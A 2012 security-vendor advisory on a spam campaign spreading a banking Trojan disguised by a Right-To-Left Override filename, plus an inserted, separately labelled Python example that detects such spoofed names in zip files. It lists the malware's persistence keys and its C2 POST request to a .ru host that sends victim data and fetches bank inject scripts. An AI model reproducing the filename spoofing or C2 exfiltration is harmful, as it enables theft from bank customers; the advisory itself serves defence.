Million dollar Tax draw spam leads to Banker Trojan

May 11, 2012

The SonicWALL UTM Research team found a new Banking Trojan variant being spammed heavily over the past three days. The spammed e-mail pretends to contain a bank form asking the user to confirm an ACH transfer worth one million dollars. The zipped attachment in the e-mail actually contains a malicious executable that uses the Right-To-Left Override technique to present itself as a document file.
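As an added defensive example (not code from the SonicWALL alert), the following Python flags the Right-To-Left Override filename trick in a zipped attachment by comparing the real extension with the one a user would see on screen; the archive and the filename it scans are constructed here for illustration.

```python
import io
import os
import zipfile

# Unicode bidi controls (U+202A..U+202E embeddings/overrides, U+2066..U+2069 isolates).
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}

def rendered_name(name: str) -> str:
    """Approximate a bidi-aware viewer: text after an RLO (U+202E) is drawn
    reversed until a PDF (U+202C) or end of string; other controls are invisible."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            end = name.find("\u202c", i + 1)
            end = len(name) if end == -1 else end
            out.append(name[i + 1:end][::-1])
            i = end + 1
        else:
            if ch not in BIDI_CONTROLS:
                out.append(ch)
            i += 1
    return "".join(out)

def analyze_filename(name: str) -> dict:
    """Compare the real extension with the one the user would see."""
    real_ext = os.path.splitext(name)[1].lower()
    shown = rendered_name(name)
    shown_ext = os.path.splitext(shown)[1].lower()
    has_bidi = any(ch in BIDI_CONTROLS for ch in name)
    return {
        "real_ext": real_ext,
        "displayed": shown,
        "extension_spoofed": has_bidi and shown_ext != real_ext,
        # Any bidi control in a filename, or an executable member, is worth a look.
        "suspicious": has_bidi or real_ext in EXECUTABLE_EXTS,
    }

def scan_zip(data: bytes) -> list:
    """Analyze every member name of a zip attachment supplied as bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [dict(name=n, **analyze_filename(n)) for n in zf.namelist()]

# Constructed sample: "ACH_Form_" + RLO + "cod.exe" renders as "ACH_Form_exe.doc".
SAMPLE_NAME = "ACH_Form_\u202ecod.exe"

def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(SAMPLE_NAME, b"placeholder bytes, not a real binary")
    return buf.getvalue()
```

Running `scan_zip(build_sample_zip())` reports the member as an `.exe` whose displayed name ends in `.doc`, which is exactly the mismatch a mail gateway should quarantine on.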

The SonicWALL Research team has captured more than 2000 copies of e-mail from this spam campaign in the past 48 hours. Below are some sample messages:

screenshot

The malicious executable found in the zipped attachments looks like:

screenshot

Upon execution, it performs the following activities:

  • Drops a copy of itself and runs it:

    • (Application Data)\KB00903122.exe [Detected as GAV: Injector.NYF (Trojan)]
  • Registry modifications:

    • HKU\UserID\Software\Microsoft\Windows Media Center [Uses this key to save the banking site list and script to inject]
    • HKU\UserID\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline: 0x00000000
    • HKU\UserID\Software\Microsoft\Windows\CurrentVersion\Run\KB00903122.exe: "(Application Data)\KB00903122.exe"
  • Connects to a remote server to send victim machine's information and receives a list of banking sites & script to inject:
      POST /rwx/B1_3n9/in/ HTTP/1.1
      Host: hmvmgywkvayilcwh.ru:8080

    screenshot
    screenshot

SonicWALL Gateway AntiVirus provides proactive protection against this spam campaign via the following signatures:

  • GAV: Injector.NYF (Trojan)
  • GAV: Suspicious#rtol.dc (Trojan)

screenshot